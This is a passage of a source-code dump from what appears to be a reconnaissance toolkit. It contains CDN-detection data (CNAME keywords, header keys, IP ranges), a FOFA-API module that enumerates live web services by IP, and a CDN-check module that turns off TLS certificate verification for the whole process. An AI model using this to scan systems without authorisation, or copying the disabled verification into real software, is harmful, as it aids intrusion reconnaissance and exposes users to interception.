98 | "ourwebpic.com": "ChinaCache",
99 | "presscdn.com": "Presscdn",
100 | "qingcdn.com": "",
101 | "qiniudns.com": "QiNiu",
102 | "skyparkcdn.net": "",
103 | "speedcdns.com": "QUANTIL",
104 | "sprycdn.com": "PowerLeader",
105 | "tlgslb.com": "Dnion",
106 | "txcdn.cn": "CDNetworks",
107 | "txnetworks.cn": "CDNetworks",
108 | "ucloud.cn": "UCloud",
109 | "unicache.com": "LineFuture",
110 | "verygslb.com": "VeryCloud",
111 | "vo.llnwd.net": "Limelight",
112 | "wscdns.com": "ChinaNetCenter",
113 | "wscloudcdn.com": "ChinaNetCenter",
114 | "xgslb.net": "Webluker",
115 | "ytcdn.net": "Akamai",
116 | "yunjiasu-cdn": "Baiduyun",
117 | "cloudfront": "CloudFront",
118 | "kunlun.com": "Alibaba Cloud",
119 | "ccgslb": "ChinaCache",
120 | "edgekey": "Akamai",
121 | "fastly": "Fastly",
122 | "chinacache": "ChinaCache",
123 | "edgekey": "Akamai",
124 | "akamai": "Akamai",
125 | "fastly": "Fastly",
126 | "edgecast": "EdgeCast",
127 | "azioncdn": "Azion",
128 | "cachefly": "CacheFly",
129 | "cdn77": "CDN77",
130 | "cdnetworks": "CDNetworks",
131 | "cdnify": "CDNify",
132 | "wscloudcdn": "ChinaNetCenter",
133 | "speedcdns": "ChinaNetCenter/Quantil",
134 | "mwcloudcdn": "ChinaNetCenter/Quantil",
135 | "cloudflare": "CloudFlare",
136 | "hwcdn": "HighWinds",
137 | "kxcdn": "KeyCDN",
138 | "awsdns": "KeyCDN",
139 | "fpbns": "Level3",
140 | "footprint": "Level3",
141 | "llnwd": "LimeLight",
142 | "netdna": "MaxCDN",
143 | "bitgravity": "Tata CDN",
144 | "azureedge": "Azure CDN",
145 | "anankecdn": "Anake CDN",
146 | "presscdn": "Press CDN",
147 | "telefonica": "Telefonica CDN",
148 | "dnsv1": "Tecent CDN",
149 | "cdntip": "Tecent CDN",
150 | "skyparkcdn": "Sky Park CDN",
151 | "ngenix": "Ngenix",
152 | "lswcdn": "LeaseWeb",
153 | "internapcdn": "Internap",
154 | "incapdns": "Incapsula",
155 | "cdnsun": "CDN SUN",
156 | "cdnvideo": "CDN Video",
157 | "clients.turbobytes.net": "TurboBytes",
158 | "clients.turbobytes.net": "TurboBytes",
159 | "turbobytes-cdn.com": "TurboBytes",
160 | "afxcdn.net": "afxcdn.net",
161 | "akamai.net": "Akamai",
162 | "akamaiedge.net": "Akamai",
163 | "akadns.net": "Akamai",
164 | "akamaitechnologies.com": "Akamai",
165 | "gslb.tbcache.com": "Alimama",
166 | "cloudfront.net": "Amazon Cloudfront",
167 | "anankecdn.com.br": "Ananke",
168 | "att-dsa.net": "AT&T",
169 | "azioncdn.net": "Azion",
170 | "belugacdn.com": "BelugaCDN",
171 | "bluehatnetwork.com": "Blue Hat Network",
172 | "systemcdn.net": "EdgeCast",
173 | "cachefly.net": "Cachefly",
174 | "cdn77.net": "CDN77",
175 | "cdn77.org": "CDN77",
176 | "panthercdn.com": "CDNetworks",
177 | "cdngc.net": "CDNetworks",
178 | "gccdn.net": "CDNetworks",
179 | "gccdn.cn": "CDNetworks",
180 | "cdnify.io": "CDNify",
181 | "ccgslb.com": "ChinaCache",
182 | "ccgslb.net": "ChinaCache",
183 | "c3cache.net": "ChinaCache",
184 | "chinacache.net": "ChinaCache",
185 | "cncssr.chinacache.net": "ChinaCache",
186 | "c3cdn.net": "ChinaCache",
187 | "lxdns.com": "ChinaNetCenter",
188 | "speedcdns.com": "QUANTIL/ChinaNetCenter",
189 | "mwcloudcdn.com": "QUANTIL/ChinaNetCenter",
190 | "cloudflare.com": "Cloudflare",
191 | "cloudflare.net": "Cloudflare",
192 | "edgecastcdn.net": "EdgeCast",
193 | "adn.": "EdgeCast",
194 | "wac.": "EdgeCast",
195 | "wpc.": "EdgeCast",
196 | "fastly.net": "Fastly",
197 | "fastlylb.net": "Fastly",
198 | "google.": "Google",
199 | "googlesyndication.": "Google",
200 | "youtube.": "Google",
201 | "googleusercontent.com": "Google",
202 | "l.doubleclick.net": "Google",
203 | "hiberniacdn.com": "Hibernia",
204 | "hwcdn.net": "Highwinds",
205 | "incapdns.net": "Incapsula",
206 | "inscname.net": "Instartlogic",
207 | "insnw.net": "Instartlogic",
208 | "internapcdn.net": "Internap",
209 | "kxcdn.com": "KeyCDN",
210 | "lswcdn.net": "LeaseWeb CDN",
211 | "footprint.net": "Level3",
212 | "llnwd.net": "Limelight",
213 | "lldns.net": "Limelight",
214 | "netdna-cdn.com": "MaxCDN",
215 | "netdna-ssl.com": "MaxCDN",
216 | "netdna.com": "MaxCDN",
217 | "stackpathdns.com": "StackPath",
218 | "mncdn.com": "Medianova",
219 | "instacontent.net": "Mirror Image",
220 | "mirror-image.net": "Mirror Image",
221 | "cap-mii.net": "Mirror Image",
222 | "rncdn1.com": "Reflected Networks",
223 | "simplecdn.net": "Simple CDN",
224 | "swiftcdn1.com": "SwiftCDN",
225 | "swiftserve.com": "SwiftServe",
226 | "gslb.taobao.com": "Taobao",
227 | "cdn.bitgravity.com": "Tata communications",
228 | "cdn.telefonica.com": "Telefonica",
229 | "vo.msecnd.net": "Windows Azure",
230 | "ay1.b.yahoo.com": "Yahoo",
231 | "yimg.": "Yahoo",
232 | "zenedge.net": "Zenedge",
233 | "cdnsun.net.": "CDNsun",
234 | "pilidns.com": "QiNiu",
235 | "sephen.com.cn": "peng"
236 | }
--------------------------------------------------------------------------------
/lib/data/cdn_header_keys.json:
--------------------------------------------------------------------------------
1 | [
2 | "xcs",
3 | "via",
4 | "x-via",
5 | "x-cdn",
6 | "x-cdn-forward",
7 | "x-ser",
8 | "x-cf1",
9 | "cache",
10 | "x-cache",
11 | "x-cached",
12 | "x-cacheable",
13 | "x-hit-cache",
14 | "x-cache-status",
15 | "x-cache-hits",
16 | "x-cache-lookup",
17 | "cc_cache",
18 | "webcache",
19 | "chinacache",
20 | "x-req-id",
21 | "x-requestid",
22 | "cf-request-id",
23 | "x-github-request-id",
24 | "x-sucuri-id",
25 | "x-amz-cf-id",
26 | "x-airee-node",
27 | "x-cdn-provider",
28 | "x-fastly",
29 | "x-iinfo",
30 | "x-llid",
31 | "sozu-id",
32 | "x-cf-tsc",
33 | "x-ws-request-id",
34 | "fss-cache",
35 | "powered-by-chinacache",
36 | "verycdn",
37 | "yunjiasu",
38 | "skyparkcdn",
39 | "x-beluga-cache-status",
40 | "x-content-type-options",
41 | "x-download-options",
42 | "x-proxy-node",
43 | "access-control-max-age",
44 | "age",
45 | "etag",
46 | "expires",
47 | "pragma",
48 | "cache-control",
49 | "last-modified"
50 | ]
51 |
--------------------------------------------------------------------------------
/lib/data/cdn_ip_cidr.json:
--------------------------------------------------------------------------------
1 | [
2 | "223.99.255.0/24",
3 | "71.152.0.0/17",
4 | "219.153.73.0/24",
5 | "125.39.46.0/24",
6 | "190.93.240.0/20",
7 | "14.0.113.0/24",
8 | "14.0.47.0/24",
9 | "113.20.148.0/22",
10 | "103.75.201.0/24",
11 | "1.32.239.0/24",
12 | "101.79.239.0/24",
13 | "52.46.0.0/18",
14 | "125.88.189.0/24",
15 | "150.138.248.0/24",
16 | "180.153.235.0/24",
17 | "205.251.252.0/23",
18 | "103.1.65.0/24",
19 | "115.127.227.0/24",
20 | "14.0.42.0/24",
21 | "109.199.58.0/24",
22 | "116.211.155.0/24",
23 | "112.253.3.0/24",
24 | "14.0.58.0/24",
25 | "223.112.227.0/24",
26 | "113.20.150.0/23",
27 | "61.182.141.0/24",
28 | "34.216.51.0/25",
29 | "124.95.188.0/24",
30 | "42.51.25.0/24",
31 | "183.136.133.0/24",
32 | "52.220.191.0/26",
33 | "119.84.93.0/24",
34 | "182.118.38.0/24",
35 | "13.59.250.0/26",
36 | "54.178.75.0/24",
37 | "119.84.92.0/24",
38 | "183.131.62.0/24",
39 | "111.32.136.0/24",
40 | "13.124.199.0/24",
41 | "111.47.227.0/24",
42 | "104.37.177.0/24",
43 | "14.0.50.0/24",
44 | "183.230.70.0/24",
45 | "114.111.59.0/24",
46 | "220.181.135.0/24",
47 | "112.140.32.0/19",
48 | "101.79.230.0/24",
49 | "14.0.115.0/24",
50 | "103.28.248.0/22",
51 | "117.34.72.0/24",
52 | "109.199.57.0/24",
53 | "101.79.149.0/24",
54 | "116.128.128.0/24",
55 | "115.231.186.0/24",
56 | "103.22.200.0/22",
57 | "61.155.165.0/24",
58 | "113.20.148.0/23",
59 | "185.254.242.0/24",
60 | "59.36.120.0/24",
61 | "70.132.0.0/18",
62 | "116.31.126.0/24",
63 | "119.147.134.0/24",
64 | "115.127.246.0/24",
65 | "52.47.139.0/24",
66 | "118.107.175.0/24",
67 | "52.78.247.128/26",
68 | "110.93.176.0/20",
69 | "54.240.128.0/18",
70 | "46.51.216.0/21",
71 | "119.31.251.0/24",
72 | "125.39.18.0/24",
73 | "108.175.33.0/24",
74 | "1.31.128.0/24",
75 | "61.151.163.0/24",
76 | "103.95.132.0/24",
77 | "58.215.118.0/24",
78 | "54.233.255.128/26",
79 | "120.52.113.0/24",
80 | "118.107.174.0/24",
81 | "1.32.242.0/24",
82 | "221.195.34.0/24",
83 | "101.79.228.0/24",
84 | "205.251.249.0/24",
85 | "113.200.91.0/24",
86 | "101.79.146.0/24",
87 | "221.238.22.0/24",
88 | "134.19.183.0/24",
89 | "110.93.160.0/20",
90 | "180.97.158.0/24",
91 | "115.127.251.0/24",
92 | "119.167.147.0/24",
93 | "115.127.238.0/24",
94 | "115.127.240.0/22",
95 | "14.0.48.0/24",
96 | "115.127.240.0/24",
97 | "113.7.183.0/24",
98 | "112.140.128.0/20",
99 | "115.127.255.0/24",
100 | "114.31.36.0/22",
101 | "101.79.232.0/24",
102 | "218.98.44.0/24",
103 | "106.119.182.0/24",
104 | "101.79.167.0/24",
105 | "125.39.5.0/24",
106 | "58.49.105.0/24",
107 | "124.202.164.0/24",
108 | "111.177.6.0/24",
109 | "61.133.127.0/24",
110 | "185.11.124.0/22",
111 | "150.138.150.0/24",
112 | "115.127.248.0/24",
113 | "103.74.80.0/22",
114 | "101.79.166.0/24",
115 | "101.71.55.0/24",
116 | "198.41.128.0/17",
117 | "117.21.219.0/24",
118 | "103.231.170.0/24",
119 | "221.204.202.0/24",
120 | "101.79.224.0/24",
121 | "112.25.16.0/24",
122 | "111.177.3.0/24",
123 | "204.246.168.0/22",
124 | "103.40.7.0/24",
125 | "134.226.0.0/16",
126 | "52.15.127.128/26",
127 | "122.190.2.0/24",
128 | "101.203.192.0/18",
129 | "1.32.238.0/24",
130 | "101.79.144.0/24",
131 | "176.34.28.0/24",
132 | "119.84.15.0/24",
133 | "18.216.170.128/25",
134 | "222.88.94.0/24",
135 | "101.79.150.0/24",
136 | "114.111.48.0/21",
137 | "124.95.168.0/24",
138 | "114.111.48.0/20",
139 | "110.93.176.0/21",
140 | "223.111.127.0/24",
141 | "117.23.61.0/24",
142 | "140.207.120.0/24",
143 | "157.255.26.0/24",
144 | "221.204.14.0/24",
145 | "183.222.96.0/24",
146 | "104.37.180.0/24",
147 | "42.236.93.0/24",
148 | "111.63.51.0/24",
149 | "114.31.32.0/20",
150 | "118.180.50.0/24",
151 | "222.240.184.0/24",
152 | "205.251.192.0/19",
153 | "101.79.225.0/24",
154 | "115.127.228.0/24",
155 | "113.20.148.0/24",
156 | "61.213.176.0/24",
157 | "112.65.75.0/24",
158 | "111.13.147.0/24",
159 | "113.20.145.0/24",
160 | "103.253.132.0/24",
161 | "52.222.128.0/17",
162 | "183.203.7.0/24",
163 | "27.221.27.0/24",
164 | "103.79.134.0/24",
165 | "123.150.187.0/24",
166 | "103.15.194.0/24",
167 | "162.158.0.0/15",
168 | "61.163.30.0/24",
169 | "182.140.227.0/24",
170 | "112.25.60.0/24",
171 | "117.148.161.0/24",
172 | "61.182.136.0/24",
173 | "114.31.56.0/22",
174 | "64.252.128.0/18",
175 | "183.61.185.0/24",
176 | "115.127.250.0/24",
177 | "150.138.138.0/24",
178 | "13.210.67.128/26",
179 | "211.162.64.0/24",
180 | "61.174.9.0/24",
181 | "14.0.112.0/24",
182 | "52.52.191.128/26",
183 | "27.221.124.0/24",
184 | "103.4.203.0/24",
185 | "103.14.10.0/24",
186 | "34.232.163.208/29",
187 | "114.31.48.0/20",
188 | "59.51.81.0/24",
189 | "183.60.235.0/24",
190 | "101.227.206.0/24",
191 | "125.39.174.0/24",
192 | "119.167.246.0/24",
193 | "118.107.160.0/21",
194 | "223.166.151.0/24",
195 | "110.93.160.0/19",
196 | "204.246.172.0/23",
197 | "119.31.253.0/24",
198 | "143.204.0.0/16",
199 | "14.0.60.0/24",
200 | "123.151.76.0/24",
201 | "116.193.80.0/24",
202 | "120.241.102.0/24",
203 | "180.96.20.0/24",
204 | "216.137.32.0/19",
205 | "223.94.95.0/24",
206 | "103.4.201.0/24",
207 | "14.0.56.0/24",
208 | "115.127.234.0/24",
209 | "113.20.144.0/23",
210 | "103.248.104.0/24",
211 | "122.143.15.0/24",
212 | "101.79.229.0/24",
213 | "101.79.163.0/24",
214 | "104.37.112.0/22",
215 | "115.127.253.0/24",
216 | "141.101.64.0/18",
217 | "113.20.144.0/22",
218 | "101.79.155.0/24",
219 | "117.148.160.0/24",
220 | "124.193.166.0/24",
221 | "109.94.168.0/24",
222 | "203.90.247.0/24",
223 | "101.79.208.0/21",
224 | "182.118.12.0/24",
225 | "114.31.58.0/23",
226 | "202.162.109.0/24",
227 | "101.79.164.0/24",
228 | "58.216.2.0/24",
229 | "222.216.190.0/24",
230 | "101.79.165.0/24",
231 | "111.6.191.0/24",
232 | "1.255.100.0/24",
233 | "52.84.0.0/15",
234 | "112.65.74.0/24",
235 | "183.250.179.0/24",
236 | "101.79.236.0/24",
237 | "119.31.252.0/24",
238 | "113.20.150.0/24",
239 | "60.12.166.0/24",
240 | "101.79.234.0/24",
241 | "113.17.174.0/24",
242 | "101.79.237.0/24",
243 | "61.54.46.0/24",
244 | "118.212.233.0/24",
245 | "183.110.242.0/24",
246 | "150.138.149.0/24",
247 | "117.34.13.0/24",
248 | "115.127.245.0/24",
249 | "14.0.102.0/24",
250 | "14.0.109.0/24",
251 | "61.130.28.0/24",
252 | "113.20.151.0/24",
253 | "219.159.84.0/24",
254 | "114.111.62.0/24",
255 | "172.64.0.0/13",
256 | "61.155.222.0/24",
257 | "120.52.29.0/24",
258 | "115.127.231.0/24",
259 | "14.0.49.0/24",
260 | "113.202.0.0/16",
261 | "103.248.104.0/22",
262 | "205.251.250.0/23",
263 | "103.216.136.0/22",
264 | "118.107.160.0/20",
265 | "109.87.0.0/21",
266 | "54.239.128.0/18",
267 | "115.127.224.0/19",
268 | "111.202.98.0/24",
269 | "109.94.169.0/24",
270 | "59.38.112.0/24",
271 | "204.246.176.0/20",
272 | "123.133.84.0/24",
273 | "103.4.200.0/24",
274 | "111.161.109.0/24",
275 | "112.84.34.0/24",
276 | "103.82.129.0/24",
277 | "183.3.254.0/24",
278 | "112.137.184.0/21",
279 | "122.227.237.0/24",
280 | "36.42.75.0/24",
281 | "13.35.0.0/16",
282 | "101.226.4.0/24",
283 | "116.140.35.0/24",
284 | "58.250.143.0/24",
285 | "13.54.63.128/26",
286 | "205.251.254.0/24",
287 | "173.245.48.0/20",
288 | "183.61.177.0/24",
289 | "113.20.144.0/24",
290 | "104.37.183.0/24",
291 | "35.158.136.0/24",
292 | "116.211.121.0/24",
293 | "42.236.94.0/24",
294 | "117.34.91.0/24",
295 | "123.6.13.0/24",
296 | "13.224.0.0/14",
297 | "113.20.146.0/24",
298 | "58.58.81.0/24",
299 | "52.124.128.0/17",
300 | "122.228.198.0/24",
301 | "197.234.240.0/22",
302 | "99.86.0.0/16",
303 | "144.220.0.0/16",
304 | "119.188.97.0/24",
305 | "36.27.212.0/24",
306 | "104.37.178.0/24",
307 | "114.31.52.0/22",
308 | "218.65.212.0/24",
309 | "1.255.41.0/24",
310 | "14.0.45.0/24",
311 | "1.32.243.0/24",
312 | "220.170.185.0/24",
313 | "122.190.3.0/24",
314 | "103.79.133.0/24",
315 | "220.181.55.0/24",
316 | "125.39.191.0/24",
317 | "115.127.226.0/24",
318 | "125.39.32.0/24",
319 | "61.120.154.0/24",
320 | "103.4.202.0/24",
321 | "103.79.134.0/23",
322 | "115.127.224.0/24",
323 | "113.20.147.0/24",
324 | "61.156.149.0/24",
325 | "210.209.122.0/24",
326 | "115.127.249.0/24",
327 | "104.37.179.0/24",
328 | "120.52.18.0/24",
329 | "54.192.0.0/16",
330 | "14.0.55.0/24",
331 | "61.160.224.0/24",
332 | "113.207.101.0/24",
333 | "101.79.157.0/24",
334 | "110.93.128.0/20",
335 | "58.251.121.0/24",
336 | "61.240.149.0/24",
337 | "130.176.0.0/16",
338 | "113.107.238.0/24",
339 | "112.65.73.0/24",
340 | "103.75.200.0/23",
341 | "199.83.128.0/21",
342 | "123.129.220.0/24",
343 | "54.230.0.0/16",
344 | "114.111.60.0/24",
345 | "199.27.128.0/21",
346 | "14.0.118.0/24",
347 | "101.79.158.0/24",
348 | "119.31.248.0/21",
349 | "54.182.0.0/16",
350 | "113.31.27.0/24",
351 | "14.17.69.0/24",
352 | "101.79.145.0/24",
353 | "113.20.144.0/21",
354 | "180.163.22.0/24",
355 | "104.37.176.0/21",
356 | "117.25.156.0/24",
357 | "115.127.252.0/24",
358 | "115.127.244.0/23",
359 | "14.0.46.0/24",
360 | "113.207.102.0/24",
361 | "52.199.127.192/26",
362 | "13.113.203.0/24",
363 | "64.252.64.0/18",
364 | "1.32.240.0/24",
365 | "123.129.232.0/24",
366 | "1.32.241.0/24",
367 | "180.163.189.0/24",
368 | "157.255.25.0/24",
369 | "1.32.244.0/24",
370 | "103.248.106.0/24",
371 | "121.48.95.0/24",
372 | "54.239.192.0/19",
373 | "113.20.146.0/23",
374 | "61.136.173.0/24",
375 | "35.162.63.192/26",
376 | "117.34.14.0/24",
377 | "183.232.29.0/24",
378 | "42.81.93.0/24",
379 | "122.228.238.0/24",
380 | "183.61.190.0/24",
381 | "125.39.239.0/24",
382 | "115.127.230.0/24",
383 | "103.140.200.0/23",
384 | "202.102.85.0/24",
385 | "14.0.32.0/21",
386 | "14.0.57.0/24",
387 | "112.25.90.0/24",
388 | "58.211.137.0/24",
389 | "210.22.63.0/24",
390 | "34.226.14.0/24",
391 | "13.32.0.0/15",
392 | "101.79.156.0/24",
393 | "103.89.176.0/24",
394 | "14.0.116.0/24",
395 | "106.42.25.0/24",
396 | "101.79.233.0/24",
397 | "101.79.231.0/24",
398 | "103.75.200.0/24",
399 | "119.188.9.0/24",
400 | "183.232.51.0/24",
401 | "149.126.72.0/21",
402 | "103.21.244.0/22",
403 | "115.127.233.0/24",
404 | "27.221.20.0/24",
405 | "198.143.32.0/19",
406 | "103.248.107.0/24",
407 | "101.79.227.0/24",
408 | "115.127.242.0/24",
409 | "119.31.250.0/24",
410 | "103.82.130.0/24",
411 | "99.84.0.0/16",
412 | "222.73.144.0/24",
413 | "103.79.132.0/22",
414 | "101.79.208.0/20",
415 | "104.37.182.0/24",
416 | "101.79.152.0/24",
417 | "36.99.18.0/24",
418 | "101.71.56.0/24",
419 | "36.250.5.0/24",
420 | "61.158.240.0/24",
421 | "119.188.14.0/24",
422 | "13.249.0.0/16",
423 | "183.214.156.0/24",
424 | "60.221.236.0/24",
425 | "58.30.212.0/24",
426 | "115.127.254.0/24",
427 | "188.114.96.0/20",
428 | "115.127.241.0/24",
429 | "103.4.200.0/22",
430 | "115.127.239.0/24",
431 | "115.127.243.0/24",
432 | "111.32.135.0/24",
433 | "120.221.29.0/24",
434 | "115.127.232.0/24",
435 | "14.0.43.0/24",
436 | "14.0.59.0/24",
437 | "183.61.236.0/24",
438 | "34.223.12.224/27",
439 | "103.24.120.0/24",
440 | "52.57.254.0/24",
441 | "113.207.100.0/24",
442 | "222.186.19.0/24",
443 | "113.20.149.0/24",
444 | "150.138.151.0/24",
445 | "115.231.110.0/24",
446 | "52.56.127.0/25",
447 | "104.37.176.0/24",
448 | "163.177.8.0/24",
449 | "163.53.89.0/24",
450 | "52.82.128.0/19",
451 | "114.111.63.0/24",
452 | "108.162.192.0/18",
453 | "14.136.130.0/24",
454 | "115.127.229.0/24",
455 | "14.17.71.0/24",
456 | "52.212.248.0/26",
457 | "180.163.188.0/24",
458 | "61.182.137.0/24",
459 | "119.161.224.0/21",
460 | "14.0.41.0/24",
461 | "202.162.108.0/24",
462 | "106.122.248.0/24",
463 | "52.66.194.128/26",
464 | "115.127.237.0/24",
465 | "220.170.186.0/24",
466 | "14.0.32.0/19",
467 | "14.0.114.0/24",
468 | "112.90.216.0/24",
469 | "115.127.236.0/24",
470 | "116.193.84.0/24",
471 | "113.207.76.0/24",
472 | "101.79.235.0/24",
473 | "101.79.224.0/20",
474 | "61.155.149.0/24",
475 | "101.79.148.0/24",
476 | "180.163.224.0/24",
477 | "204.246.174.0/23",
478 | "183.60.136.0/24",
479 | "101.227.207.0/24",
480 | "103.248.105.0/24",
481 | "119.188.35.0/24",
482 | "42.236.7.0/24",
483 | "116.193.88.0/21",
484 | "116.193.83.0/24",
485 | "120.199.69.0/24",
486 | "122.226.182.0/24",
487 | "58.20.204.0/24",
488 | "110.93.128.0/21",
489 | "115.231.187.0/24",
490 | "69.28.58.0/24",
491 | "114.31.32.0/19",
492 | "112.25.91.0/24",
493 | "59.52.28.0/24",
494 | "117.27.149.0/24",
495 | "61.147.92.0/24",
496 | "14.0.117.0/24",
497 | "14.0.40.0/24",
498 | "119.97.151.0/24",
499 | "103.199.228.0/22",
500 | "122.70.134.0/24",
501 | "115.127.244.0/24",
502 | "223.112.198.0/24",
503 | "115.127.225.0/24",
504 | "104.16.0.0/12",
505 | "121.12.98.0/24",
506 | "103.31.4.0/22",
507 | "204.246.164.0/22",
508 | "223.94.66.0/24",
509 | "35.167.191.128/26",
510 | "116.31.127.0/24",
511 | "101.79.226.0/24",
512 | "34.195.252.0/24",
513 | "115.127.247.0/24",
514 | "61.240.144.0/24",
515 | "108.175.32.0/20",
516 | "120.197.85.0/24",
517 | "183.232.53.0/24",
518 | "111.161.66.0/24",
519 | "117.34.28.0/24",
520 | "45.64.64.0/22",
521 | "14.0.44.0/24",
522 | "109.86.0.0/15",
523 | "182.23.211.0/24",
524 | "58.211.2.0/24",
525 | "119.36.164.0/24",
526 | "116.55.250.0/24",
527 | "101.227.163.0/24",
528 | "13.228.69.0/24",
529 | "120.221.136.0/24",
530 | "119.188.132.0/24",
531 | "115.127.235.0/24",
532 | "42.236.6.0/24",
533 | "125.88.190.0/24",
534 | "61.54.47.0/24",
535 | "103.27.12.0/22",
536 | "116.193.80.0/21",
537 | "101.79.159.0/24",
538 | "123.155.158.0/24",
539 | "111.47.226.0/24",
540 | "131.0.72.0/22",
541 | "192.230.64.0/18"
542 | ]
--------------------------------------------------------------------------------
/lib/modules/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/modules/fofa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import json
6 | import base64
7 | import random
8 | import requests
9 | # 禁用安全请求警告
10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
12 | from concurrent.futures import ThreadPoolExecutor, as_completed
13 | from lib.common.connectionPool import conn_pool
14 | from config.setting import fofaApi, fofaSize, fofaCountry
15 | from config.setting import USER_AGENTS
16 | from config.setting import threadNum, default_headers
17 |
18 | # 进度条设置
19 | from rich.progress import (
20 | BarColumn,
21 | TimeRemainingColumn,
22 | Progress,
23 | )
24 |
25 | progress = Progress(
26 | "[progress.description]{task.description}",
27 | BarColumn(),
28 | "[progress.percentage]{task.percentage:>3.0f}%",
29 | TimeRemainingColumn(),
30 | "[bold red]{task.completed}/{task.total}",
31 | transient=True
32 | )
33 |
34 |
35 | class Fofa:
36 | def __init__(self, ip):
37 | super(Fofa, self).__init__()
38 | self.email = fofaApi['email']
39 | self.key = fofaApi['key']
40 | self.headers = {
41 | "Cache-Control": "max-age=0",
42 | "User-Agent": random.choice(USER_AGENTS),
43 | "Upgrade-Insecure-Requests": "1",
44 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
45 | }
46 | self.ip = ip
47 | self.urls = [] # fofa 查询到的web服务列表
48 | self.life_urls = [] # 验证存活的web服务列表
49 |
50 | def run(self):
51 | keywordsBs = base64.b64encode(self.ip.encode('utf-8'))
52 | keywordsBs = keywordsBs.decode('utf-8')
53 |
54 | url = "https://fofa.so/api/v1/search/all?email={0}&key={1}&qbase64={2}&full=true&fields=ip,title,port,domain,protocol,host,country&size={3}".format(
55 | self.email, self.key, keywordsBs, fofaSize)
56 | try:
57 | session = conn_pool()
58 | target = session.get(url, timeout=10)
59 | # logger.log('INFOR', f'正在检测IP: {self.ip}')
60 | # logger.log('INFOR', '正在通过API获取信息...')
61 | datas = json.loads(target.text)
62 | self.ip_info(datas['results'])
63 | session.close()
64 |
65 | self.is_life()
66 | return self.life_urls
67 |
68 | except requests.exceptions.ReadTimeout:
69 | pass
70 | # logger.log('ERROR', '请求超时')
71 | except requests.exceptions.ConnectionError as e:
72 | pass
73 | # logger.log('ERROR', f'网络超时 {e}')
74 | except json.decoder.JSONDecodeError:
75 | pass
76 | # logger.log('ERROR', '获取失败,请重试')
77 | finally:
78 | return self.life_urls
79 |
80 | def ip_info(self, datas):
81 | for data in datas:
82 | # ip,title,port,domain,protocol,host,country
83 | # ['127.0.0.1', 'Metasploit - Setup and Configuration', '3790', '', '', 'https://127.0.0.1:3790', 'CN']
84 | # 只要限定国家的信息, 默认为CN
85 | if data[6] == fofaCountry:
86 | if data[4] == "http" or data[4] == "https":
87 | url = "{0}://{1}".format(data[4], data[5])
88 | if url not in self.urls:
89 | self.urls.append(url)
90 |
91 | # 筛选存活的web服务
92 | def is_life(self):
93 | if len(self.urls) == 0:
94 | return
95 | session = conn_pool()
96 | for url in self.urls:
97 | try:
98 | status_code = session.get(url, headers=default_headers, timeout=5).status_code
99 | if status_code < 500:
100 | self.life_urls.append(url)
101 | except requests.exceptions.ConnectionError:
102 | pass
103 | session.close()
104 |
105 |
106 | def run(ip, task):
107 | fofa = Fofa(ip)
108 | result = fofa.run()
109 | progress.update(task, advance=1)
110 | return result
111 |
112 |
113 | def fmain(ips):
114 | # result ['http://127.0.0.1:3790', 'http://127.0.0.1:80', 'https://127.0.0.1:443']
115 | result = []
116 |
117 | try:
118 | # 进度条
119 | with progress:
120 | task = progress.add_task("[cyan]FOFA search、Filtering the surviving Web services ", total=len(ips), start=False)
121 |
122 | executor = ThreadPoolExecutor(max_workers=threadNum)
123 |
124 | all_task = [executor.submit(run, ip, task) for ip in ips]
125 |
126 | for future in as_completed(all_task):
127 | data = future.result()
128 | result.extend(data)
129 | except KeyboardInterrupt:
130 | pass
131 | finally:
132 | return result
133 |
134 |
--------------------------------------------------------------------------------
/lib/modules/iscdn.py:
--------------------------------------------------------------------------------
1 | '''
2 | 判断cdn
3 | 参考oneforall
4 | https://github.com/shmilylty/OneForAll/blob/master/modules/iscdn.py
5 | '''
6 |
7 | import socket
8 | from config import setting
9 | from config.log import logger
10 | import requests
11 | requests.packages.urllib3.disable_warnings()
12 | import re
13 | import asyncio
14 | import ipaddress
15 | import geoip2.database
16 | # 忽略https证书验证
17 | import ssl
18 | if hasattr(ssl, '_create_unverified_context'):
19 | ssl._create_default_https_context = ssl._create_unverified_context
20 | import dns.resolver
21 | from urllib.parse import urlparse
22 | import time
23 | from concurrent.futures import ThreadPoolExecutor
24 | from lib.common.utils import load_json
25 | # 进度条设置
26 | from rich.progress import (
27 | BarColumn,
28 | TimeRemainingColumn,
29 | Progress,
30 | )
31 |
32 | progress = Progress(
33 | "[progress.description]{task.description}",
34 | BarColumn(),
35 | "[progress.percentage]{task.percentage:>3.0f}%",
36 | TimeRemainingColumn(),
37 | "[bold red]{task.completed}/{task.total}",
38 | transient=True, # 100%后隐藏进度条
39 | )
40 |
41 | data_dir = setting.data_storage_dir
42 |
43 |
44 | # from https://github.com/al0ne/Vxscan/blob/master/lib/iscdn.py
45 | cdn_ip_cidr = load_json(data_dir.joinpath('cdn_ip_cidr.json'))
46 | cdn_asn_list = load_json(data_dir.joinpath('cdn_asn_list.json'))
47 |
48 | # from https://github.com/Qclover/CDNCheck/blob/master/checkCDN/cdn3_check.py
49 | cdn_cname_keyword = load_json(data_dir.joinpath('cdn_cname_keywords.json'))
50 | cdn_header_key = load_json(data_dir.joinpath('cdn_header_keys.json'))
51 |
52 |
53 | def get_cname(cnames, cname): # get cname
54 | try:
55 | answer = dns.resolver.resolve(cname, 'CNAME')
56 | cname = [_.to_text() for _ in answer][0]
57 | cnames.append(cname)
58 | get_cname(cnames, cname)
59 | except dns.resolver.NoAnswer:
60 | pass
61 |
62 |
63 | def get_cnames(cnames, url): # get all cname
64 |
65 | if url.find('://') < 0:
66 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
67 | else:
68 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
69 | try:
70 | answer = dns.resolver.resolve(netloc,'CNAME')
71 | except Exception as e:
72 | cnames = None
73 | else:
74 | cname = [_.to_text() for _ in answer][0]
75 | cnames.append(cname)
76 | get_cname(cnames, cname)
77 | return str(cnames)
78 |
79 |
80 | # get headers url 要以http:// 或者https:// 开头,这里简单判断一下,没有则加上http://
81 | def get_headers(url):
82 | try:
